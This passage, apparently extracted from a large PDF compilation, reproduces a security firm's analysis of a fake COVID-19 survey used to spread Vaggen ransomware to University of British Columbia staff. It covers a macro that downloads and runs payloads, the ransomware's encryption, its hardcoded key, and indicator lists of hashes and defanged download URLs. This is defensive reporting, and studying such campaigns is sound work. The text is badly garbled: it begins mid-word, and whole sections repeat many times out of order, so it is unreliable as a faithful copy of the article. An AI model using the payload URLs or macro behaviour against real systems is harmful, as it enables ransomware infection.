the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2593 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2594 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2595 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2596 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2597 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2598 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2599 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2600 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2601 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2602 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2603 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2604 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2605 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2606 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2607 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2608 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2609 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2610 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2611 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2612 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2613 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2614 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2615 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2616 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2617 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2618 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2619 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2620 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2621 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2622 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2623 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2624 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 